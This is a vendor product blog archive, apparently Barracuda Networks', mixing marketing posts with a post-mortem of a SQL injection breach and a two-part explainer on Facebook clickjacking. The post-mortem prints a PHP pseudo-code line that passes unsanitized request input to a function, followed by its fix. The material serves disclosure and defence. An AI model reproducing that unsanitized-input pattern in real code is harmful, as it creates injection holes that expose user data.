Barracuda Spam & Virus Firewall « Barracuda Networks Product Blog

Barracuda Spam & Virus Firewall

At Barracuda Networks, 2012 is the Year of the School

Friday, February 10th, 2012

by Sanjay Ramnath, Product Manager

K-12 schools, districts, and agencies simply can’t afford not to make sure that their networks, data, and users are totally secure—especially with vulnerable students accessing those networks every day. The dangers are too great to take any chances. And with mobile devices and social-media usage extending the threat landscape in new directions, yesterday’s solutions simply aren’t good enough.

That’s why 2012 will see Barracuda Networks reaching out to K-12 organizations in North America—including public and private schools, school districts, and county and state education agencies—to let them know that effective, affordable, easy-to-manage security solutions are out there, optimized just for them.

To learn more about how Barracuda solutions address the unique network security challenges facing K-12 organizations, please download this informative white paper, entitled “Dynamic Content Security for K-12 Organizations.”

The Barracuda Advantage

“Dynamic Content Security” is the name for a more holistic, integrated approach to network security that delivers:

Improved network performance
Dramatic cost savings—both long- and short-term
Total content security that protects every user—including mobile and off-network users
Fine-grained controls to optimize capacity and access
Simple, centralized control panel to make network management a breeze (plus award-winning customer and technical support for when it’s not)
Comprehensive forensic reporting to optimize resources and budgets, identify bandwidth-hogging users and apps, demonstrate regulatory compliance, and manage civil or criminal liability
Multiple deployment options—including on-site appliances, virtual appliances, cloud-based services, or a combination—to ensure a solution that fits your needs, capabilities, and budget

Promotional Payment Terms for K-12 Customers

We understand the intense budget pressures affecting schools, districts, and agencies today. That’s why we created the K-12 Budget Alignment Program . This limited-time promotion allows qualified North American K-12 customers to postpone paying for their Barracuda security solutions until July 31, 2012—long enough to take advantage of new-fiscal-year budget allocations.

With the K-12 Budget Alignment Program 2012, security and compliance don’t have to wait; but paying for them can.

And there’s more, K-12 organizations may also qualify for a significant discount off the retail list price of selected Barracuda solutions. To learn more, contact Barracuda today at 1-888-ANTI-SPAM (1-888-268-4772).

Managing the Transformation in Education

K-12 education is changing, and technology is driving that change. The benefits of these changes are immense. But without a new approach to security, the threats they bring could easily overwhelm the advantages.

At Barracuda, we’re committed to helping K-12 organizations use Dynamic Content Security to manage that transformation safely, securely, simply, and affordably. With Barracuda solutions in place, schools can rest assured that their user community is protected; that network management will continue to be streamlined and simple; and that their IT costs will be kept as low as possible well into the future.

Posted in Barracuda Backup Service, Barracuda Email Security Service, Barracuda Link Balancer, Barracuda Load Balancer, Barracuda Message Archiver, Barracuda NG Firewall, Barracuda SSL VPN, Barracuda Spam & Virus Firewall, Barracuda Vx, Barracuda Web Application Firewall, Barracuda Web Filter, Barracuda Web Security Flex, Hybrid protection, Social Networking, Uncategorized | No Comments »

Why Outbound Filtering for Emails?

Thursday, December 15th, 2011

by Leena Merciline, product manager

This past week I encountered a customer issue, which occurs on a fairly regular basis. The customer’s secure email gateway, a Barracuda Spam & Virus Firewall, was blocking emails from an external sender based on reputation analysis. As you can guess, the sender was not too happy about this. In this particular case, the sender’s IP address was blocked because spam was detected from it. This could be due to a number of reasons, which may include an internal compromised system generating spam or unintentional spamming by the sender.

This brings up the fact that, in today’s computing environment, IT departments can no longer assume that the internal networks are secure and free from malware. The use of outbound email filtering protects an organization on two fronts – prevents the organization’s IP addresses from getting on block lists, and prevents sensitive data in emails from leaving the organization. Delay in detecting that your organization is on a block list can cause frustration and disrupt business. Plus removal from a block list takes time. Furthermore, for compliance with industry or government regulations, emails with customer confidential information need to be protected. This means blocking such emails or enforcing encryption.

I’d like to share a brief case study below of a customer who has already seen the benefits of using outbound email filtering on the Barracuda Spam & Virus Firewall.

Coming back to the customer issue, the sending organization could have avoided getting on the block list if it had deployed outbound email filtering. For more information about outbound email filtering visit the Barracuda Spam & Virus Firewall product page, or contact one of our sales product specialists at +1 408 342 5400.

Posted in Barracuda Spam & Virus Firewall | No Comments »

Barracuda Spam & Virus Firewall Firmware Release 5.1

Monday, October 24th, 2011

Posted by: Leena Merciline, Product Manager

With the availability of its latest firmware release 5.1, the Barracuda Spam & Virus Firewall continues to expand its feature set to offer customers more capabilities to secure their email infrastructure. Customers with current Energize Update Subscriptions can download this new firmware update. Major new features in this release are outlined below.

Internal Email Protection

With the Barracuda Microsoft Exchange Anti-Virus Agent, organizations can now protect their internal emails using the same virus definitions used by the Barracuda Spam & Virus Firewall. Viruses can easily be transmitted internally through the use of Outlook Web Access from home PCs, public kiosks and other machines not under the organization’s control. This can also apply to POP and IMAP if external access is allowed, and unauthorized machines are used to send email. Uploaded files can then be transmitted as email attachments to others within the organization. The agent, an add-in, runs as a Windows service on the Microsoft Exchange Server and enables the server to scan internal email for viruses. Via the agent, the Microsoft Exchange Server will receive constant virus definition updates.

Seamless Encryption with Microsoft Outlook

Senders now have the option to mark emails for encryption within Microsoft Outlook. The Barracuda Microsoft Outlook add-in includes an Encrypt Message button. While composing a message, the sender can mark the email for encryption using the Encrypt button and then send it. The encrypting process will be done by the Barracuda Spam & Virus Firewall and integrates with the existing outbound email encryption feature.

Email Encryption Branding

This release allows organizations to brand encryption notification emails as well as encrypted messages. The branding configuration is done on the Barracuda Spam & Virus Firewall on a per-domain level. Administrators can create custom subject and text or html message content in any language for the notification email. Encrypted messages on the Barracuda Message Center can be branded with a logo image and a domain name.

IPv6 Email Transport

New IPv6 support provides email receipt and delivery over IPv6 networks. The Barracuda Spam & Virus Firewall can receive email traffic from an IPv6 network, apply content policies, and deliver email traffic to either an IPv4 or IPv6 network. Email traffic can also be redirected by policy to an IPv6 server. Barracuda Reputation, DNS, and other Layer 3 checks will continue to be IPv4 only.

Outbound Sender Based Rate Control

To protect against compromised systems on internal networks sending high volume spam, Sender Based Rate Control feature for outbound emails is now based on the number of recipients. If the number of recipients from a sender exceeds the configured maximum in a 30-minute time window, the Barracuda Spam & Virus Firewall will defer further messages from the sender.

Enhanced Barracuda Control Center Integration

With this release, administrators can centrally manage more global policies of the Barracuda Spam & Virus Firewall using Barracuda Networks’ centralized management application, the Barracuda Control Center. Administrators can manage Basic features, Block/Accept policies, and most Advanced features. The Barracuda Control Center provides a single view for configuration and management of multiple Barracuda Spam & Virus Firewalls.

The Barracuda Spam & Virus 5.1 firmware release includes additional user interface and mail processing enhancements. Please take a look at the 5.1 release notes for the details. For more information, please visit the Barracuda Spam & Virus Firewall product page.

Posted in Barracuda Spam & Virus Firewall | No Comments »

Combining on-premises and cloud-based solutions for the most effective email security

Thursday, July 28th, 2011

by Aseem Asthana and Leena Merciline

The Barracuda Spam & Virus Firewall offers customers the most effective email security through its innovative hybrid deployment. The on-premises appliance combined with its Cloud Protection Layer pre-filter provides unmatched detection and protection against email-borne threats.

When enabled, emails are first processed by the Cloud Protection Layer before being delivered to the on-premises Barracuda Spam & Virus Firewall, which further checks and allows for compliance with organizational policy, outbound email scanning and email encryption.

The Cloud Protection Layer blocks spam, viruses, fraud and phishing emails before they enter the corporate network, allowing customers to benefit from rapid changes in cloud protection techniques and more up-to-date cloud intelligence. The Cloud Protection Layer uses technologies that have been time tested with the Barracuda Spam & Virus Firewall along with advanced cloud-based technologies including:

Barracuda Anti-Fraud Intelligence Engine – detects and blocks fraudulent emails
Barracuda Anti-Virus Supercomputing Grid – detects and blocks polymorphic viruses , viruses that try to evade detection by changing their signature

The Barracuda Spam & Virus Firewall further processes emails that have been filtered by the Cloud Protection Layer to ensure the most effective email security.

Recipient verification checks protect against Directory Harvest Attacks. Since the Barracuda Spam & Virus Firewall is usually inside the network, there is no need to open any ports in the network firewall for communicating with the directory server. The Barracuda Spam & Virus Firewall also provides granular policy checks, and emails can be blocked, quarantined or tagged based on specific rules.

Outbound email is scanned before being sent out of the organization, helping to ensure compliance with corporate policies and also to prevent compromised computers from being used as bots.

The Barracuda Spam & Virus Firewall also provides email encryption. Emails that match policy are securely transferred to the Barracuda Message Center which encrypts the emails and sends an out-of-band notification to the sender.

The Cloud Protection Layer is available to all Barracuda Spam & Virus Firewall customers with a valid Energize Updates subscription, running firmware release 5.0.0.003. A Barracuda Customer Login account is needed for setup. Sign up for an account by visiting https://www.barracudanetworks.com/login. Administration of the Cloud Protection Layer is provided through Barracuda Control Center.

Visit the Barracuda Spam & Virus Firewall more information on how the Cloud Protection Layer can help your organization.

Tags: Anti-Spam, Antivirus, Cloud Security, Email Security, Phishing
Posted in Barracuda Spam & Virus Firewall, Uncategorized | No Comments »

Why are Web site Attacks on the Rise?

Friday, June 24th, 2011

Posted by: Steve Pao, VP of product management and Oliver Wai, product marketing manager

Recent high-profile Web security breaches have caused organizations in both the private and public sectors to take a deeper look into the security measures they have in place as well as to question why there is such a recent concentration of attacks. We believe there are a few trends underlying the recent increase of attacks:

The first is the prevalence of hacking tools and “how-to-guides” that are now available online on how to launch attacks. Whereas attacks used to be perpetrated by sophisticated hackers, now almost anyone can launch attack using these resources and automated tools. Just Google “how to hack [system]”, “hacking tools” and you will find a plethora of tools and tips on how to accomplish these objectives.
The second trend is economics. Traditional money making scams and threats like spam are increasingly ineffective as tools to protect against these threats have increased in use among organizations. On the other hand, there is a thriving black market for stolen credit cards, emails, identities, zombie computers, etc. so data breaches are extremely profitable for hackers, and as a result, they are turning more attention to profitable endeavors like hacking Web sites.
The final trend is an increase in Web attacks for strategic purposes. Many of the most recent attacks like the ones on defense contractors, RSA/EMC, and Gmail are extremely sophisticated and seem to have a strategic purpose or sponsorship to them.

Unfortunately, many of these attacks are happening because the right security measures are not in place at many organizations. This is not because there are not very effective solutions available, but instead there is a general lack of awareness and education about how these solutions can protect against such attacks. In many cases, a breach itself serves as the defining lesson for why Web application security tools – such as a WAF (Web Application Firewall) should be in place. In addition, the need for security layers within any organization’s infrastructure is also very important.

Overall, organizations need to know of the importance of having the right technology at each layer to protect their resources and the recent attacks can serve to reinforce this need:

Protect your email infrastructure with an email filtering solution or service
Secure your Web sites and Web applications with a WAF
Reinforce your network perimeter with a next generation firewall
Strengthen your network against malware, drive-by-downloads and other threats with a Web filtering device or service

Barracuda Networks offers solutions to help organizations reinforce their network infrastructures from these attacks. For more information on our complete line of security offerings, please visit the Product section of our Web site.

Tags: data breaches, email filtering, WAF, Web Application Security
Posted in Barracuda NG Firewall, Barracuda Spam & Virus Firewall, Barracuda Web Application Firewall, Barracuda Web Filter, Barracuda Web Security Flex, Uncategorized, Web Security | No Comments »

Barracuda Spam & Virus Firewall: Email Encryption for Everyone

Tuesday, May 31st, 2011

Posted by: Aseem Asthana, product manager

Email encryption is commonly used by organizations to exchange sensitive information without fear of it falling in the wrong hands. Encryption works by obfuscating a plain text email with a “key” that is unique to the recipient. This ensures that only the recipient can decrypt and read the email. For this scheme to work, the sender must have the recipient’s keys and trust that they belong to the right person. Ensuring every sender has every potential recipient’s correct key is a significant problem and hampers widespread deployment and use of email encryption.

The Barracuda Spam & Virus Firewall solves this problem by providing cloud-based email encryption which stores keys in a central location, so senders and recipients don’t have to worry about non-essentials.

Outbound emails are encrypted based on policies that are set by the administrator. Emails that match policy are securely transmitted to the cloud-based Barracuda Message Center which encrypts the emails with the recipient’s correct keys. The recipient is sent an out-of-band notification via email, which includes a link. Upon clicking the link, the recipient can read the email that is meant for them. Since encryption is done in the cloud, there is no need to exchange keys between the sender and recipient, solving the problem that has plagued successful adoption of email encryption.

The traditional per user pricing schemes for email encryption are another barrier to widespread deployment. Organizations commonly respond by designating a user or a group that is authorized to send out sensitive information via encrypted emails. Everyone else is required to submit sensitive information to this designated user or group for review and ultimate delivery via encrypted email. This imposes an unnatural change in how email is sent and received and impacts the speed of business.

There are no per user licensing fees associated with any feature of the Barracuda Spam & Virus Firewall, including email encryption. Organizations can rest assured that outbound emails containing sensitive information will be sent securely without having to worry about licensing fees.

Email encryption is available to all customers with a valid Energize Updates subscription running firmware release 5.0.0.003 and above. Visit the Barracuda Spam & Virus Firewall product page for more information.

Posted in Barracuda Spam & Virus Firewall | No Comments »

Anatomy of a SQL Injection Attack

Tuesday, April 26th, 2011

Posted by: Oliver Wai, product marketing manager

As you probably heard from our previous blog posting, Barracuda Networks suffered a breach from a SQL Injection attack on the weekend of April 8. While the overall impact of the breach turned out to be relatively minor (only contact names, including names and emails), such an event always involves a post-mortem. As is often the case in events such as data breaches or data center outages, there is never one single error that leads to the outage or attack but rather a series of interrelated errors that ultimately results in a failure or vulnerability that can be exploited. Taken individually, each event is usually accounted for by the organization and there are redundancies in place to handle any failure issues. However when taken together, the unexpected – in this case an attack on our site – occurs. In analyzing the attack, we observed:

In the rush to continually add timely and fresh content to the corporate Web site, a few mistakes were made in the PHP code.
Code vulnerability scanning of the affected part of the Web site was scheduled but had not yet occurred.
The Web Application Firewall that was put in place to harden the Web site was put into Passive Mode by human error during a maintenance window.

So while there were redundancies in place to secure our Web site, an unfortunate confluence of events last weekend left a vulnerability in our Web site exposed; this resulted in the SQL injection attack by a group we believe to be originating in Malaysia. The upside? Since the Barracuda Web Application Firewall was still inspecting traffic even in Passive Mode, it gave us a detailed audit trail of the SQL Injection probe and the subsequent attack. This gave us the necessary forensics to quickly analyze the breach, contain the damage and reach out to those affected.

Analyzing the Attack

From our Barracuda Web Application Firewall logs we determined that there were two clients used to probe and attack the barracudanetworks.com Web site:

Using the information reported by the Barracuda Web Application Firewall, we were able to quickly filter and find the corresponding entries on our Web server logs:

(NOTE: the Web server logs use Greenwich Mean Time (GMT) whereas the Web Application Firewall uses Pacific Daylight Time (PDT) zone)

Drilling down into details of each entry on the Barracuda Web Application Firewall logs gives us clues on the attackers and the tools used in the attack:

The first attack started at 5:07pm PDT on April 9 and had an IP address of 115.134.249.15 which resolved to somewhere near Kuala Lumpur, Malaysia. This confirms online reports of the hacks originating from Malaysia. We also noticed that the attackers launched the attacks using a modified version of a pentest tool designed by “white hats” to probe Web sites for SQL injection vulnerabilities. This also seems to corroborate reports that the hackers responsible for the attacks hung out on “white hat” online communities. Looking at our Web server logs, we also see the same entries, enabling us to trace down what was attempted and what succeeded on our backend systems.

(NOTE: the Web server logs use GMT whereas the Web Application Firewall uses PDT)

From the recorded logs, it was clear that the first attacker used the automated tool to recursively crawl through the barracudanetworks.com Web site and blindly injected a series of SQL commands against each input parameter to find potential vulnerabilities. The SQL Injection tool finds the first vulnerability at 5:16pm PDT but continues to probe the Web site. At 8:10pm PDT a second client using the IP address of 87.106.220.57 joined the attack. The second IP address resolved to a server in Germany but it is unclear at this time if the server was a relay point or if it was a second attacker. Nevertheless, activities from the second IP were recorded and logged by the Barracuda Web Application Firewall:

Below is the screenshot of the corresponding Web server log:

(NOTE: the Web server logs use GMT whereas the Web Application Firewall uses PDT)

From the logs captured in the Barracuda Web Application Firewall, it seems that the attacker used the second client to launch manual attacks against discovered vulnerabilities while the primary attack script continued to scan the Web site for vulnerabilities. Ultimately, the attackers focused their efforts on a single line of weakness in a peripheral Web page where the input parameters were not properly sanitized. Here is the pseudo-code of the underlying vulnerability:

<?=Foo_Function( $_GET['parameter'] )?> //Takes user input

By not sanitizing the input value, it gave the attackers the ability to inject SQL commands into the HTML input parameter to attack the underlying database.

All developers are taught to never trust user inputs and that all inputs must be sanitized before sending it to underlying servers. However, what you can see from this example is that it is often not obvious to the naked eye that there is anything wrong with the code. This is why in addition to using defensive coding, Barracuda Networks also uses code scanners and our own Web Application Firewall to guard against possible vulnerabilities. Unfortunately in a Web site of tens of thousands of lines of code, all it takes is a single mistake. We have since fixed the code to protect against future attacks by adding a single line of code to sanitize the inputs on the affected page:

$parameter = @is_sanitized($_GET['parameter']) ? $_GET[' parameter '] : 0;

<?=Foo_Function($parameter)?>

From Vulnerability to Breach

Once the attackers found the vulnerable page, they attempted to steal the database user accounts. Over the next 10 hours, they tried a number of different attacks in an attempt to break into the underlying database but failed each time. At 3:06am PDT, the attackers changed strategy to focus on the underlying database schema. This proved to be a correct strategy and by 3:19am PDT the first set of database records containing contact email addresses was stolen.

Barracuda Networks discovered the breach at 10:30am PDT and the Barracuda Web Application Firewall was re-enabled to Active Mode at 10:39am PDT. Once in place, the Barracuda Web Application Firewall immediately blocked all subsequent attacks from the 115.134.249.15 IP address. The attacker continued to cycle through attacks against the remaining pages for the next few hours, even when the Barracuda Web Application Firewall blocked all of the attacks. This seems to confirm that an automated pentest tool was used to blindly inject SQL commands. In all, a total of 110,892 SQL injection commands from both attacking IP addresses were sent against 175 URLS at a rate of 42 per minute.

In tracing the Web Firewall and Access logs on the Barracuda Web Application Firewall, we determined that the attackers compromised a Marketing database and stole two sets of records containing a total of 21,861 names and emails. However since there were a number of duplicates between the two sets and the fact that many of the entries were from users who are no longer with the original organizations, the number of affected users is substantially lower.

Any breach is a serious issue and we have reached out to the affected users documenting what has happened and any necessary precautions that they may need to take in response. We believe that the users affected by the breach are at minimal risk. We do not store any sensitive information in our Marketing database other than names and email addresses. Moreover, since Barracuda Networks primarily uses this data to send emails on upcoming events, Webinars, or other corporate news, the risk of spear-phishing is low as all communications are one-directional and informational in nature. Finally since most users are existing Barracuda Spam & Virus Firewall customers, the vast majority of potential spam would likely be blocked regardless.

Conclusion

In hindsight, it was clear the Barracuda Web Application Firewall would have been able to detect and protect our Web site from the recent SQL Injection attack that occurred. However the reality of the situation is that with most breaches, the weak link is typically not with the technology itself but rather with the human element and the processes associated with security. Unfortunately attackers today have more sophisticated tools at their disposal to find victims. They can now automate the tedious task of finding vulnerabilities and focus solely on the “last mile” once a vulnerability is detected. What this means to the rest of us is that attacks will likely become more common and affect a much wider range of organizations.

The silver lining to this experience was that it helped us to demonstrate the effectiveness of the Barracuda Web Application Firewall in providing the necessary protection and auditing capabilities to defend against SQL injection attacks. The Barracuda Web Application Firewall was able to identify the SQL injection attack and would have blocked the attack if it had been placed in Active Mode. Nevertheless even in Passive Mode, the Barracuda Web Application Firewall was able to gather detailed forensic information that we used to investigate, contain and audit the affected systems. Using this data, we were able to quickly identify how the attacks occurred, what was breached and who we needed to reach out to after the incident.

While we have definitely advised customers on the risks of not securing their Web applications and we certainly have heard the worst-case scenarios from our customers as a vendor, we did not imagine that we would find ourselves having first-hand experience with such a scenario. We learned some valuable lessons in this situation and we hope that our story serves as evidence of how important it is to harden and secure your Web applications.

Posted in Barracuda Spam & Virus Firewall, Barracuda Web Application Firewall, Web Security | No Comments »

Web Applications – The Weak Link of Security

Tuesday, September 7th, 2010

Posted by: Oliver Wai, product marketing manager

Today’s hackers are becoming increasingly sophisticated in planning and executing well designed multi-vector attacks. It used to be that attackers only employed a singular strategy to attack end users or computer systems. For example, virus attacks used to be spread by an email attachment. However with the mass adoption of email security products such as the Barracuda Spam & Virus Firewall and increased public awareness, these attacks are no longer effective since most attacks are quickly contained or blocked once detected.

A hacker is at once a rogue computer expert and a social psychologist who understands how people react. In order to have any efficacy, today’s hacker must now use a number of mechanisms in tandem in order to trick users into sending personal data or downloading malicious software. A well disguised spam email that takes a user to a legitimate Web site that has been compromised in advance with a Cross-Site Scripting (XSS) attack to use social engineering techniques to steal personal or financial information is a typical example of the elaborate web a hacker weaves.

Web Applications – The Weak Link

An old adage states that “you are only as strong as your weakest link.” Organizations have made investments in network firewalls and IDS/IPS systems to protect their networks. They have invested in security products to protect their email. However, many organizations leave Web applications unprotected. Considering that 75-90 percent of all attacks today are against Web applications, there is shockingly little security awareness and protection deployed to protect Web applications.

Because of all the dynamic feature functionality expected by users, Web applications use numerous programming languages & protocols to build efficient, multi-tier applications. A small application can easily have hundreds of thousands of lines of code, use more than 4 programming languages and be written by teams of engineers who might not have met in person before or may not work for the organization anymore. Given all the moving parts that are required to build an application, it is nearly impossible to build a perfectly secure application. A US Department of Defense study indicated that there are nearly 15 critical security defects in every thousand lines of code. According to Forrester Research, even if a security defect is found, it still takes on average 30-90 days before it is fixed, tested, and applied to the application. Hackers know about the difficulty of writing secure Web applications and they readily exploit vulnerabilities for large financial gains.

Your corporate Web sites, eCommerce portals, and other Web properties need protection. If you can access an application from a browser, then it is a Web application. Internal applications accessed by your employees such as Outlook Web Access, Oracle Financials, Microsoft SharePoint, SAP, Peoplesoft, or Issue Tracking Systems are all Web applications that need protection from attacks. What are you doing to protect them and how can you manage the security on the numerous applications required to keep your business running?

Barracuda Web Application Firewall – Protecting and Accelerating Web Applications

The Barracuda Web Application Firewall is an industry leading Web application security appliance used by some of the largest banks, car manufacturers, and government agencies around the world. It is also used by numerous mid-market organizations and small businesses to protect their valuable Web assets. With thousands of appliances in deployment, it protects a sizeable number of domains that millions of people visit each year.

The key to the Barracuda Web Application Firewall’s success is in its ease of use. While there may be other solutions in the market, none provides the power, flexibility, and simplicity of the Barracuda Web Application Firewall. Using the industry standard reverse proxy architecture, the Barracuda Web Application Firewall provides deep inspection capability that allows it to protect applications from inbound attacks as well as outbound leaks of sensitive data such as social security and credit card numbers. Most importantly, the Barracuda Web Application Firewall is easy to configure and deploy. Using the predefined security policies included in all Barracuda Web Application Firewalls, many organizations have been able to self-install and protect against 85 percent of all Web application attacks in less than a day, sometimes in just a few hours.

In addition to Web application security, the Barracuda Web Application Firewall revolutionizes Web application delivery by providing numerous application acceleration capabilities free of charge. SSL offloading, load balancing, content routing, caching, compression, access control, server health monitoring, and TCP pooling are standard functionality on all enterprise-level Web Application Firewalls. Our design philosophy at Barracuda Networks is to design a solution that not only protects our customers Web assets but also enhances the application experience of our customers’ customer.

For questions about the Barracuda Web Application Firewall, please visit http://www.barracuda.com/waf or call Barracuda Networks for a free 30-day evaluation at 1-888-ANTI-SPAM or +1 408-342-5400. For more information on our other security and productivity solutions, please visit http://www.barracuda.com/products

Posted in Barracuda Spam & Virus Firewall, Barracuda Web Application Firewall | No Comments »

How to Prevent Clickjacking Attacks

Wednesday, June 16th, 2010

Posted by: Oliver Wai, product marketing manager

This is part two of a two-part post on how Web site clickjacking attacks work, and how to prevent them.

Unlike other common Web vulnerabilities, clickjacking is not a consequence of a bug in a Web application. Instead, clickjacking exploits the way browsers use HTML/CSS/JavaScript to render pages. It affects all of the major browser platforms including Internet Explorer, Mozilla Firefox, Google Chrome, and Apple Safari.

Why does this Matter?

While the Facebook attack shown in our previous blog entry is more of a nuisance, it still illustrates the potential danger of clickjacking within the context of social networks. This attack demonstrates how a smart attacker can use social channels to spread malware by spoofing trusted users within the social group. More importantly, attacks of this sort can quickly morph into more serious attacks when combined with more sophisticated techniques such as a Cross-Site Request Forgery (CSRF) attack or password stealing Trojans. Imagine if an attacker injects a clickjacking script onto a legitimate Web site that tricks the user into submitting a forged request. Because the action is generated by the victim during a valid session, it is extremely difficult for the application to detect that the request was spoofed.

Clickjacking Prevention Must Start at the Client Browser

The key solution to preventing clickjacking is to improve Web browser functionality to detect and defend against hidden iFrames and malicious JavaScript. The main browser platforms have already begun to add clickjacking prevention:

Mozilla Firefox has a NoScript Add-On that helps prevent scripting from untrusted domains
Microsoft IE, Apple Safari, and Google Chrome have implemented a HTTP header, X-FRAME-OPTIONS check to allow the host application to specify if they allow Framing.

While these provide a step in the right direction, it will take some time before this solves clickjacking problems due slow adoption and/or patching by developers and the general public.

Server-Side Solutions that Can Limit the Risk of Clickjacking

Until all browsers fix clickjacking vulnerabilities, organizations need to focus on prevention and mitigation. Some steps can be done to prevent clickjacking:

1. Install a Spam & Virus Firewall

Clickjacking starts by tricking users into visiting compromised sites. One major vector of attack is through spam or spoofed emails. Blocking spam is key to stopping clickjacking at the source.

2. Filter Web Traffic and Block Malicious Sites

Web Filters can block users from accessing dangerous sites that may contain clickjacking techniques.

3. Protect your Web Applications from Clickjacking Scripts

Web Application Firewalls can scrub all content for malicious scripts and deny attackers from injecting clickjacking scripts onto your Web site.

4. Protect your Web Application Forms

Web Application Firewalls can inject Nonce (tokens) into HTTP forms to limit exposure from unsolicited form updates launched by clickjacking attempts. Application Firewalls can also validate form parameter inputs to prevent malicious input from being sent to the Web Servers.

5. Periodically Log-out Users

Web applications that keep users logged in (like Facebook) are vulnerable to forged requests launched by clickjacking. Users should be periodically logged out to limit chances for exposure.

Outlook

Clickjacking is a challenging client-side vulnerability that needs to be solved by the Web Browser platforms. The major Web platform vendors are already working on clickjacking solutions and organization must ensure that their users are installing the latest patches as they are released. Finally organizations can limit the scope of damage and windows of opportunity for clickjacking to take place by applying preventative countermeasures through the use of Web Application Firewalls, Spam & Virus Firewalls, and/or Web Filters.

Posted in Barracuda Spam & Virus Firewall, Barracuda Web Application Firewall, Barracuda Web Filter | No Comments »

Anatomy of a Clickjacking Attack

Monday, June 14th, 2010

Posted by: Oliver Wai, product marketing manager

This is part one of a two-part post on how Web site clickjacking attacks work, and how to prevent them.

The success of Facebook clickjacking is due in large part to the social nature of the Web site. Users of Facebook are MUCH more likely to click on a particular link if (s)he believes that the link was posted by a friend. Unfortunately, attackers also understand this dynamic and as a result, they are using Facebook as a new vector to deliver attacks.

What is Clickjacking?

Clickjacking (aka user interface (UI) redressing) is an attack where an attacker has injected malicious content onto compromised page (Web site A) to trick the user into clicking on a link or button from another domain (Web site B). Typically the attack is set up by the creation of an invisible or disguised iFrame on Web site A that points to a UI button on Web site B. The button could be used to launch a forged cross site request, to download malware, or for any other malicious activity.

How does this Apply to Facebook?

In the recent Facebook Clickjacking attacks, an attacker sets off a variant of a Facebook worm that sends users to a clickjacked Web page that exploits Facebook’s “Like” infrastructure. This is accomplished through a series of well-designed steps:

1. Find the Victims.

The attacker likely created a spam email, banner ad or some other type of bait to trick people into clicking the malware. The bait could be a spoofed link to pornography, free products, celebrity gossip, or any other enticements. For our example, let’s assume the bait is an email with a link that says “Check this New Video of a Dancing Bear!”

2. Clickjack the Victims’ Facebook Accounts.

Once the victim clicks on the malware link, the bait will take the user to an intermediary page displaying a warning that asks the user to “Click to continue” or “Verify that you are least 18 years old” to view. This is where the clickjacking occurs. On this page there is an invisible iFrame that uses JavaScript to silently follow the user’s mouse icon. No matter where the user clicks on the page, the victim will end up clicking on the hidden iFrame that launches a clickjacking attack on the user’s Facebook page.

3. Spread to the Victims’ Social Networks.

Because most users are permanently logged into Facebook, if the user clicks anywhere on the clickjacked page, a link is published on the Victim’s Profile with the same link used to lure the original victim of the attack:

“Check this New Video of a Dancing Bear!”

This appears on all of the user’s contacts’ Facebook News Feed. If any of the victim’s friends on Facebook clicks the link, they are also sent to the clickjacked page. If the new victim clicks anywhere on the page, a “Like” link would be added to their Facebook profile, starting the cycle again.

Check out part two of this post on how to prevent a clickjacking attack.

Posted in Barracuda Spam & Virus Firewall, Barracuda Web Application Firewall, Barracuda Web Filter, Uncategorized | No Comments »

Barracuda Networks Product Blog